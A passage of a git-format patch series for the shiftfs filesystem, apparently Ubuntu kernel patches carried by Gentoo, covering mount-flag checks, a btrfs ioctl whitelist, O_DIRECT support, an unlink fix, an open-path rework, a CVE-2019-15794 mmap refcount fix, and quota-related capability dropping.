++	if ((old_flags & SB_NOATIME) && !(new_flags & SB_NOATIME))
++		return -EPERM;
++
++	if ((old_flags & SB_NODIRATIME) && !(new_flags & SB_NODIRATIME))
++		return -EPERM;
++
++	if (!(old_flags & SB_POSIXACL) && (new_flags & SB_POSIXACL))
++		return -EPERM;
++
++	return 0;
++}
++
+ static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
+ {
+ 	int err;
+@@ -1818,6 +1845,10 @@ static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
+ 	if (err)
+ 		return err;
+ 
++	err = shiftfs_super_check_flags(sb->s_flags, *flags);
++	if (err)
++		return err;
++
+ 	/* Mark mount option cannot be changed. */
+ 	if (info->mark || (info->mark != new.mark))
+ 		return -EPERM;
+@@ -1847,6 +1878,16 @@ struct shiftfs_data {
+ 	const char *path;
+ };
+ 
++static void shiftfs_super_force_flags(struct super_block *sb,
++				      unsigned long lower_flags)
++{
++	sb->s_flags |= lower_flags & (SB_RDONLY | SB_NOSUID | SB_NODEV |
++				      SB_NOEXEC | SB_NOATIME | SB_NODIRATIME);
++
++	if (!(lower_flags & SB_POSIXACL))
++		sb->s_flags &= ~SB_POSIXACL;
++}
++
+ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 			      int silent)
+ {
+@@ -1888,6 +1929,8 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 		goto out_put_path;
+ 	}
+ 
++	sb->s_flags |= SB_POSIXACL;
++
+ 	if (sbinfo->mark) {
+ 		struct super_block *lower_sb = path.mnt->mnt_sb;
+ 
+@@ -1904,6 +1947,8 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 		 */
+ 		sb->s_iflags = SB_I_NOEXEC;
+ 
++		shiftfs_super_force_flags(sb, lower_sb->s_flags);
++
+ 		/*
+ 		 * Handle nesting of shiftfs mounts by referring this mark
+ 		 * mount back to the original mark mount. This is more
+@@ -1972,6 +2017,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 		 * passthrough settings.
+ 		 */
+ 		sbinfo->passthrough_mark = sbinfo_mp->passthrough;
++		shiftfs_super_force_flags(sb, path.mnt->mnt_sb->s_flags);
+ 	}
+ 
+ 	sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1;
+@@ -1995,7 +2041,6 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 	sb->s_op = &shiftfs_super_ops;
+ 	sb->s_xattr = shiftfs_xattr_handlers;
+ 	sb->s_d_op = &shiftfs_dentry_ops;
+-	sb->s_flags |= SB_POSIXACL;
+ 	sb->s_root = d_make_root(inode);
+ 	if (!sb->s_root) {
+ 		err = -ENOMEM;
+-- 
+2.39.2
+
+From 650ec55632c03c03e6cc5b08a764609b4b0eb192 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Tue, 11 Jun 2019 11:47:35 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: allow changing ro/rw for subvolumes
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1832316
+
+This enables toggling between ro/rw for btrfs subvolumes under shiftfs.
+
+Currently, btrfs workloads employing shiftfs regress. With btrfs,
+unprivileged users can already toggle whether a subvolume will be ro
+or rw. This is broken on current shiftfs, as we haven't whitelisted
+these ioctls.
+To prevent such regression, we need to whitelist the ioctls
+BTRFS_IOC_FS_INFO, BTRFS_IOC_SUBVOL_GETFLAGS, and
+BTRFS_IOC_SUBVOL_SETFLAGS. All of them should be safe for unprivileged
+users.
+
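+As a rough illustration (not part of the patch; the path is made up),
+the toggle that this whitelisting re-enables looks like:
+
+ #include <sys/ioctl.h>
+ #include <fcntl.h>
+ #include <err.h>
+ #include <linux/btrfs.h>
+
+ int main(void) {
+ 	__u64 flags;
+ 	int fd = open("mnt/shiftfs/subvol", O_RDONLY);
+ 	if (fd == -1) err(1, "open subvol");
+ 	if (ioctl(fd, BTRFS_IOC_SUBVOL_GETFLAGS, &flags) == -1)
+ 		err(1, "getflags");
+ 	flags ^= BTRFS_SUBVOL_RDONLY; /* flip between ro and rw */
+ 	if (ioctl(fd, BTRFS_IOC_SUBVOL_SETFLAGS, &flags) == -1)
+ 		err(1, "setflags");
+ 	return 0;
+ }
+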
+Cc: Seth Forshee <seth.forshee@canonical.com>
+Cc: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 21 ++++++++++++++++++---
+ 1 file changed, 18 insertions(+), 3 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index a1dae7ea593b..49f6714e9f95 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1507,9 +1507,14 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
+ 	return ret;
+ }
+ 
+-static bool in_ioctl_whitelist(int flag)
++static bool in_ioctl_whitelist(int flag, unsigned long arg)
+ {
++	void __user *argp = (void __user *)arg;
++	u64 flags = 0;
++
+ 	switch (flag) {
++	case BTRFS_IOC_FS_INFO:
++		return true;
+ 	case BTRFS_IOC_SNAP_CREATE:
+ 		return true;
+ 	case BTRFS_IOC_SNAP_CREATE_V2:
+@@ -1517,6 +1522,16 @@ static bool in_ioctl_whitelist(int flag)
+ 	case BTRFS_IOC_SUBVOL_CREATE:
+ 		return true;
+ 	case BTRFS_IOC_SUBVOL_CREATE_V2:
++		return true;
++	case BTRFS_IOC_SUBVOL_GETFLAGS:
++		return true;
++	case BTRFS_IOC_SUBVOL_SETFLAGS:
++		if (copy_from_user(&flags, arg, sizeof(flags)))
++			return false;
++
++		if (flags & ~BTRFS_SUBVOL_RDONLY)
++			return false;
++
+ 		return true;
+ 	case BTRFS_IOC_SNAP_DESTROY:
+ 		return true;
+@@ -1536,7 +1551,7 @@ static long shiftfs_ioctl(struct file *file, unsigned int cmd,
+ 	case FS_IOC_SETFLAGS:
+ 		break;
+ 	default:
+-		if (!in_ioctl_whitelist(cmd) ||
++		if (!in_ioctl_whitelist(cmd, arg) ||
+ 		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
+ 			return -ENOTTY;
+ 	}
+@@ -1555,7 +1570,7 @@ static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd,
+ 	case FS_IOC32_SETFLAGS:
+ 		break;
+ 	default:
+-		if (!in_ioctl_whitelist(cmd) ||
++		if (!in_ioctl_whitelist(cmd, arg) ||
+ 		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
+ 			return -ENOIOCTLCMD;
+ 	}
+-- 
+2.39.2
+
+From cd66a65bbea66683404adadd7d61ec02d04ac21a Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Fri, 19 Jul 2019 17:50:46 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: add O_DIRECT support
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1837223
+
+This enables O_DIRECT support for shiftfs if the underlay supports it.
+
+Currently shiftfs does not handle O_DIRECT even if the underlay supports it.
+This is blocking dqlite - an essential part of LXD - from profiting from
+the performance benefits of O_DIRECT on suitable filesystems when used
+with async io such as aio or io_uring.
+Overlayfs cannot support this directly since the upper filesystem in
+overlay can be any filesystem. So if the upper filesystem does not
+support O_DIRECT but the lower filesystem does you're out of luck.
+Shiftfs does not suffer from the same problem since there is no concept
+of an upper filesystem in the way that overlayfs has one.
+Essentially, shiftfs is a transparent shim relaying everything to the
+underlay while overlayfs' upper layer is not (completely).
+
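+A minimal userspace sketch of what this enables, assuming the underlay
+supports O_DIRECT (path and sizes are made up):
+
+ #define _GNU_SOURCE
+ #include <stdlib.h>
+ #include <fcntl.h>
+ #include <unistd.h>
+ #include <err.h>
+
+ int main(void) {
+ 	void *buf;
+ 	int fd = open("mnt/shiftfs/file", O_RDONLY | O_DIRECT);
+ 	if (fd == -1) err(1, "open O_DIRECT");
+ 	/* O_DIRECT requires suitably aligned buffers and offsets */
+ 	if (posix_memalign(&buf, 4096, 4096)) err(1, "posix_memalign");
+ 	if (pread(fd, buf, 4096, 0) == -1) err(1, "pread");
+ 	return 0;
+ }
+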
+Cc: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 49f6714e9f95..addaa6e21e57 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1126,6 +1126,9 @@ static int shiftfs_open(struct inode *inode, struct file *file)
+ 	}
+ 
+ 	file->private_data = file_info;
++	/* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO. */
++	file->f_mapping = realfile->f_mapping;
++
+ 	file_info->realfile = realfile;
+ 	return 0;
+ }
+-- 
+2.39.2
+
+From 772a8ea3a85f0530a76bc8dbe4e91de92aa35180 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Fri, 19 Jul 2019 17:50:47 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: pass correct pointer down
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1837231
+
+This used to pass an unsigned long to copy_from_user() instead of a
+void __user * pointer. This will produce a warning with a sufficiently
+advanced compiler.
+
+Cc: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index addaa6e21e57..9006201c243d 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1529,7 +1529,7 @@ static bool in_ioctl_whitelist(int flag, unsigned long arg)
+ 	case BTRFS_IOC_SUBVOL_GETFLAGS:
+ 		return true;
+ 	case BTRFS_IOC_SUBVOL_SETFLAGS:
+-		if (copy_from_user(&flags, arg, sizeof(flags)))
++		if (copy_from_user(&flags, argp, sizeof(flags)))
+ 			return false;
+ 
+ 		if (flags & ~BTRFS_SUBVOL_RDONLY)
+-- 
+2.39.2
+
+From ca8b1596f4e2a5a3c8ee7b7cb45d4703b329c891 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Thu, 29 Aug 2019 20:45:07 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix buggy unlink logic
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1841977
+
+The way we messed with setting i_nlink was brittle and wrong. We used to
+set the i_nlink of the shiftfs dentry to be deleted to the i_nlink count
+of the underlay dentry of the directory it resided in, which makes no
+sense whatsoever. We also missed drop_nlink(), which is crucial since
+i_nlink affects whether a dentry is cleaned up on dput().
+With this I cannot reproduce the bug anymore where shiftfs misleads zfs
+into believing that a deleted file cannot be removed from disk because
+it is still referenced.
+
+Fixes: commit 87011da41961 ("shiftfs: rework and extend")
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 15 ++++++++++-----
+ 1 file changed, 10 insertions(+), 5 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 9006201c243d..e80db9480b5c 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -585,6 +585,7 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+ {
+ 	struct dentry *lowerd = dentry->d_fsdata;
+ 	struct inode *loweri = dir->i_private;
++	struct inode *inode = d_inode(dentry);
+ 	int err;
+ 	const struct cred *oldcred;
+ 
+@@ -594,15 +595,19 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+ 		err = vfs_rmdir(loweri, lowerd);
+ 	else
+ 		err = vfs_unlink(loweri, lowerd, NULL);
+-	inode_unlock(loweri);
+ 	revert_creds(oldcred);
+ 
+-	shiftfs_copyattr(loweri, dir);
+-	set_nlink(d_inode(dentry), loweri->i_nlink);
+-	if (!err)
++	if (!err) {
+ 		d_drop(dentry);
+ 
+-	set_nlink(dir, loweri->i_nlink);
++		if (rmdir)
++			clear_nlink(inode);
++		else
++			drop_nlink(inode);
++	}
++	inode_unlock(loweri);
++
++	shiftfs_copyattr(loweri, dir);
+ 
+ 	return err;
+ }
+-- 
+2.39.2
+
+From 81445d2871aef886eabb56c7f124d491f445fcc7 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Fri, 30 Aug 2019 14:14:31 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: mark slab objects
+ SLAB_RECLAIM_ACCOUNT
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1842059
+
+Shiftfs does not mark its slab cache as reclaimable. While this is not
+a big deal, it is not nice to the kernel in general. The shiftfs cache is
+not so important that it can't be reclaimed.
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index e80db9480b5c..a21cb473e000 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -2108,7 +2108,7 @@ static int __init shiftfs_init(void)
+ {
+ 	shiftfs_file_info_cache = kmem_cache_create(
+ 		"shiftfs_file_info_cache", sizeof(struct shiftfs_file_info), 0,
+-		SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
++		SLAB_RECLAIM_ACCOUNT | SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
+ 	if (!shiftfs_file_info_cache)
+ 		return -ENOMEM;
+ 
+-- 
+2.39.2
+
+From 3d0e90c90e6b1b915b9ac760c865529b28cf1cdd Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Wed, 2 Oct 2019 09:57:14 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: rework how shiftfs opens files
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1846265
+
+This commit simplifies how shiftfs opens files, both regular files and
+directories.
+
+In the first iteration, we implemented a kmem cache for struct
+shiftfs_file_info which stashed away a struct path and the struct file
+for the underlay. The path however was never used anywhere so the struct
+shiftfs_file_info and therefore the whole kmem cache can go away.
+Instead we move to the same model as overlayfs and just stash away the
+struct file for the underlay in file->private_data of the shiftfs struct
+file.
+Additionally, we split the .open method for files and directories.
+Similar to overlayfs, .open for regular files uses open_with_fake_path(),
+which ensures that it doesn't contribute to the open file count (since
+this would mean we'd count double). The .open method for directories,
+however, uses dentry_open(), which contributes to the open file count.
+
+The basic logic for opening files is unchanged. The main point is to
+ensure that a reference to the underlay's dentry is kept through struct
+path.
+
+Various bits and pieces of this were cooked up in discussions Seth and I
+had in Paris.
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 105 +++++++++++++++++++++++----------------------------
+ 1 file changed, 47 insertions(+), 58 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index a21cb473e000..55bb32b611f2 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -31,13 +31,6 @@ struct shiftfs_super_info {
+ 	unsigned int passthrough_mark;
+ };
+ 
+-struct shiftfs_file_info {
+-	struct path realpath;
+-	struct file *realfile;
+-};
+-
+-struct kmem_cache *shiftfs_file_info_cache;
+-
+ static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
+ 			       umode_t mode, dev_t dev, struct dentry *dentry);
+ 
+@@ -1042,21 +1035,21 @@ static const struct inode_operations shiftfs_symlink_inode_operations = {
+ };
+ 
+ static struct file *shiftfs_open_realfile(const struct file *file,
+-					  struct path *realpath)
++					  struct inode *realinode)
+ {
+-	struct file *lowerf;
+-	const struct cred *oldcred;
++	struct file *realfile;
++	const struct cred *old_cred;
+ 	struct inode *inode = file_inode(file);
+-	struct inode *loweri = realpath->dentry->d_inode;
++	struct dentry *lowerd = file->f_path.dentry->d_fsdata;
+ 	struct shiftfs_super_info *info = inode->i_sb->s_fs_info;
++	struct path realpath = { .mnt = info->mnt, .dentry = lowerd };
+ 
+-	oldcred = shiftfs_override_creds(inode->i_sb);
+-	/* XXX: open_with_fake_path() not gauranteed to stay around, if
+-	 * removed use dentry_open() */
+-	lowerf = open_with_fake_path(realpath, file->f_flags, loweri, info->creator_cred);
+-	revert_creds(oldcred);
++	old_cred = shiftfs_override_creds(inode->i_sb);
++	realfile = open_with_fake_path(&realpath, file->f_flags, realinode,
++				       info->creator_cred);
++	revert_creds(old_cred);
+ 
+-	return lowerf;
++	return realfile;
+ }
+ 
+ #define SHIFTFS_SETFL_MASK (O_APPEND | O_NONBLOCK | O_NDELAY | O_DIRECT)
+@@ -1096,8 +1089,7 @@ static int shiftfs_change_flags(struct file *file, unsigned int flags)
+ 
+ static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
+ {
+-	struct shiftfs_file_info *file_info = file->private_data;
+-	struct file *realfile = file_info->realfile;
++	struct file *realfile = file->private_data;
+ 
+ 	lowerfd->flags = 0;
+ 	lowerfd->file = realfile;
+@@ -1111,51 +1103,57 @@ static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
+ 
+ static int shiftfs_open(struct inode *inode, struct file *file)
+ {
+-	struct shiftfs_super_info *ssi = inode->i_sb->s_fs_info;
+-	struct shiftfs_file_info *file_info;
+ 	struct file *realfile;
+-	struct path *realpath;
+ 
+-	file_info = kmem_cache_zalloc(shiftfs_file_info_cache, GFP_KERNEL);
+-	if (!file_info)
+-		return -ENOMEM;
+-
+-	realpath = &file_info->realpath;
+-	realpath->mnt = ssi->mnt;
+-	realpath->dentry = file->f_path.dentry->d_fsdata;
+-
+-	realfile = shiftfs_open_realfile(file, realpath);
+-	if (IS_ERR(realfile)) {
+-		kmem_cache_free(shiftfs_file_info_cache, file_info);
++	realfile = shiftfs_open_realfile(file, inode->i_private);
++	if (IS_ERR(realfile))
+ 		return PTR_ERR(realfile);
+-	}
+ 
+-	file->private_data = file_info;
++	file->private_data = realfile;
+ 	/* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO. */
+ 	file->f_mapping = realfile->f_mapping;
+ 
+-	file_info->realfile = realfile;
+ 	return 0;
+ }
+ 
+-static int shiftfs_release(struct inode *inode, struct file *file)
++static int shiftfs_dir_open(struct inode *inode, struct file *file)
+ {
+-	struct shiftfs_file_info *file_info = file->private_data;
++	struct file *realfile;
++	const struct cred *oldcred;
++	struct dentry *lowerd = file->f_path.dentry->d_fsdata;
++	struct shiftfs_super_info *info = inode->i_sb->s_fs_info;
++	struct path realpath = { .mnt = info->mnt, .dentry = lowerd };
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	realfile = dentry_open(&realpath, file->f_flags | O_NOATIME,
++			       info->creator_cred);
++	revert_creds(oldcred);
++	if (IS_ERR(realfile))
++		return PTR_ERR(realfile);
+ 
+-	if (file_info) {
+-		if (file_info->realfile)
+-			fput(file_info->realfile);
++	file->private_data = realfile;
+ 
+-		kmem_cache_free(shiftfs_file_info_cache, file_info);
+-	}
++	return 0;
++}
++
++static int shiftfs_release(struct inode *inode, struct file *file)
++{
++	struct file *realfile = file->private_data;
++
++	if (realfile)
++		fput(realfile);
+ 
+ 	return 0;
+ }
+ 
++static int shiftfs_dir_release(struct inode *inode, struct file *file)
++{
++	return shiftfs_release(inode, file);
++}
++
+ static loff_t shiftfs_dir_llseek(struct file *file, loff_t offset, int whence)
+ {
+-	struct shiftfs_file_info *file_info = file->private_data;
+-	struct file *realfile = file_info->realfile;
++	struct file *realfile = file->private_data;
+ 
+ 	return vfs_llseek(realfile, offset, whence);
+ }
+@@ -1274,8 +1272,7 @@ static int shiftfs_fsync(struct file *file, loff_t start, loff_t end,
+ 
+ static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma)
+ {
+-	struct shiftfs_file_info *file_info = file->private_data;
+-	struct file *realfile = file_info->realfile;
++	struct file *realfile = file->private_data;
+ 	const struct cred *oldcred;
+ 	int ret;
+ 
+@@ -1671,8 +1668,7 @@ static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx)
+ {
+ 	const struct cred *oldcred;
+ 	int err = -ENOTDIR;
+-	struct shiftfs_file_info *file_info = file->private_data;
+-	struct file *realfile = file_info->realfile;
++	struct file *realfile = file->private_data;
+ 
+ 	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
+ 	err = iterate_dir(realfile, ctx);
+@@ -1698,13 +1694,13 @@ const struct file_operations shiftfs_file_operations = {
+ };
+ 
+ const struct file_operations shiftfs_dir_operations = {
++	.open			= shiftfs_dir_open,
++	.release		= shiftfs_dir_release,
+ 	.compat_ioctl		= shiftfs_compat_ioctl,
+ 	.fsync			= shiftfs_fsync,
+ 	.iterate_shared		= shiftfs_iterate_shared,
+ 	.llseek			= shiftfs_dir_llseek,
+-	.open			= shiftfs_open,
+ 	.read			= generic_read_dir,
+-	.release		= shiftfs_release,
+ 	.unlocked_ioctl		= shiftfs_ioctl,
+ };
+ 
+@@ -2106,19 +2102,12 @@ static struct file_system_type shiftfs_type = {
+ 
+ static int __init shiftfs_init(void)
+ {
+-	shiftfs_file_info_cache = kmem_cache_create(
+-		"shiftfs_file_info_cache", sizeof(struct shiftfs_file_info), 0,
+-		SLAB_RECLAIM_ACCOUNT | SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
+-	if (!shiftfs_file_info_cache)
+-		return -ENOMEM;
+-
+ 	return register_filesystem(&shiftfs_type);
+ }
+ 
+ static void __exit shiftfs_exit(void)
+ {
+ 	unregister_filesystem(&shiftfs_type);
+-	kmem_cache_destroy(shiftfs_file_info_cache);
+ }
+ 
+ MODULE_ALIAS_FS("shiftfs");
+-- 
+2.39.2
+
+From 0afd6d19d12a42d7905110a41cdb3815e023467c Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Wed, 6 Nov 2019 09:38:57 -0600
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: Restore vm_file value when lower fs
+ mmap fails
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1850994
+
+shiftfs_mmap() overwrites vma->vm_file before calling the lower
+filesystem mmap but does not restore the original value on
+failure. This means it is giving a pointer to the lower fs file
+back to the caller with no reference, which is a bad practice.
+However, it does not lead to any issues with upstream kernels as
+no caller accesses vma->vm_file after call_mmap().
+
+With the aufs patches applied the story is different. Whereas
+mmap_region() previously fput a local variable containing the
+file it assigned to vm_file, it now calls vma_fput() which will
+fput vm_file, for which it has no reference, and the reference
+for the original vm_file is not put.
+
+Fix this by restoring vma->vm_file to the original value when the
+mmap call into the lower fs fails.
+
+CVE-2019-15794
+
+Reported-by: Jann Horn <jannh@google.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 15 +++++++++++----
+ 1 file changed, 11 insertions(+), 4 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 55bb32b611f2..57d84479026b 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1289,10 +1289,17 @@ static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma)
+ 
+ 	shiftfs_file_accessed(file);
+ 
+-	if (ret)
+-		fput(realfile); /* Drop refcount from new vm_file value */
+-	else
+-		fput(file); /* Drop refcount from previous vm_file value */
++	if (ret) {
++		/*
++		 * Drop refcount from new vm_file value and restore original
++		 * vm_file value
++		 */
++		vma->vm_file = file;
++		fput(realfile);
++	} else {
++		/* Drop refcount from previous vm_file value */
++		fput(file);
++	}
+ 
+ 	return ret;
+ }
+-- 
+2.39.2
+
+From 5b548337ff886dfb00ec3a142693226394673126 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Wed, 23 Oct 2019 14:22:28 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: setup correct s_maxbytes limit
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1849482
+
+Set the s_maxbytes limit to MAX_LFS_FILESIZE.
+Currently shiftfs limits the maximum size for fallocate() needlessly,
+causing calls such as fallocate --length 2GB ./file to fail. This
+limitation is arbitrary since it's not caused by the underlay but
+rather by shiftfs itself capping the s_maxbytes. This causes bugs such
+as the one reported in [1].
+
+[1]: https://github.com/lxc/lxd/issues/6333
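+
+A minimal sketch of the call that used to fail and now succeeds (the
+path is made up):
+
+ #define _GNU_SOURCE
+ #include <fcntl.h>
+ #include <err.h>
+
+ int main(void) {
+ 	int fd = open("mnt/shiftfs/file", O_RDWR | O_CREAT, 0644);
+ 	if (fd == -1) err(1, "open");
+ 	if (fallocate(fd, 0, 0, 2ULL << 30)) /* 2 GiB */
+ 		err(1, "fallocate");
+ 	return 0;
+ }
+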
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Connor Kuehl <connor.kuehl@canonical.com>
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 57d84479026b..6a2b5e3d0d53 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -2064,6 +2064,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 	inode->i_private = dentry->d_inode;
+ 
+ 	sb->s_magic = SHIFTFS_MAGIC;
++	sb->s_maxbytes = MAX_LFS_FILESIZE;
+ 	sb->s_op = &shiftfs_super_ops;
+ 	sb->s_xattr = shiftfs_xattr_handlers;
+ 	sb->s_d_op = &shiftfs_dentry_ops;
+-- 
+2.39.2
+
+From fa7001e866380a4d2f45022295b6db1fd0cf12c5 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Wed, 23 Oct 2019 14:23:50 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: drop CAP_SYS_RESOURCE from effective
+ capabilities
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1849483
+
+Currently shiftfs allows exceeding project quota and reserved space on
+e.g. ext2. See [1] and especially [2] for a bug report. This is very
+much not what we want. Quotas and reserved space settings set on the
+host need to be respected. The cause for this issue is overriding the
+credentials with the superblock creator's credentials whenever we
+perform operations such as fallocate() or writes while retaining
+CAP_SYS_RESOURCE.
+
+The fix is to drop CAP_SYS_RESOURCE from the effective capability set
+after we have made a copy of the superblock creator's credential at
+superblock creation time. This very likely gives us more security than
+we had before and the regression potential seems limited. I would like
+to try this apporach first before coming up with something potentially
+more sophisticated. I don't see why CAP_SYS_RESOURCE should become a
+limiting factor in most use-cases.
+
+[1]: https://github.com/lxc/lxd/issues/6333
+[2]: https://github.com/lxc/lxd/issues/6333#issuecomment-545154838
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Connor Kuehl <connor.kuehl@canonical.com>
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 8 ++++++--
+ 1 file changed, 6 insertions(+), 2 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 6a2b5e3d0d53..0d6ce377b07c 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1958,6 +1958,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 	sb->s_flags |= SB_POSIXACL;
+ 
+ 	if (sbinfo->mark) {
++		struct cred *cred_tmp;
+ 		struct super_block *lower_sb = path.mnt->mnt_sb;
+ 
+ 		/* to mark a mount point, must root wrt lower s_user_ns */
+@@ -2012,11 +2013,14 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 			sbinfo->passthrough_mark = sbinfo->passthrough;
+ 		}
+ 
+-		sbinfo->creator_cred = prepare_creds();
+-		if (!sbinfo->creator_cred) {
++		cred_tmp = prepare_creds();
++		if (!cred_tmp) {
+ 			err = -ENOMEM;
+ 			goto out_put_path;
+ 		}
++		/* Don't override disk quota limits or use reserved space. */
++		cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE);
++		sbinfo->creator_cred = cred_tmp;
+ 	} else {
+ 		/*
